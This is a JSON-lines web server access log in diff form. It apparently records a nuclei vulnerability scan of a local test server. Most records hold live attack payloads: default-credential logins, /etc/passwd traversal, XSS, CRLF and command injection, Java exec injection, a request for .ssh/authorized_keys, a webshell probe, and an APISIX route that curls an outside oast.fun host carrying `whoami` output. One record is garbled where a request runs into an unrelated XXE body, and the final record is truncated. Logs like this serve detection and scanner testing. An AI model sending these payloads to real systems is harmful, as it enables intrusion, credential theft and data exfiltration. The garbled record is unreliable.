+{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"ca281d8smpvb9r2g07h0jfbb437ore3xt.oast.site","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://ca281d8smpvb9r2g07h0weow6w14zuq9e.oast.site/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KAY9p0iwWFPqFgWmbdtuD2UVQ/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/29KAY5JrerLcZ8po6ltDYEkTOTa\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://ca285tosmpvbafqg07h0iw6z49kt6fqew.oast.fun/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KAY9p0iwWFPqFgWmbdtuD2UVQ/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php 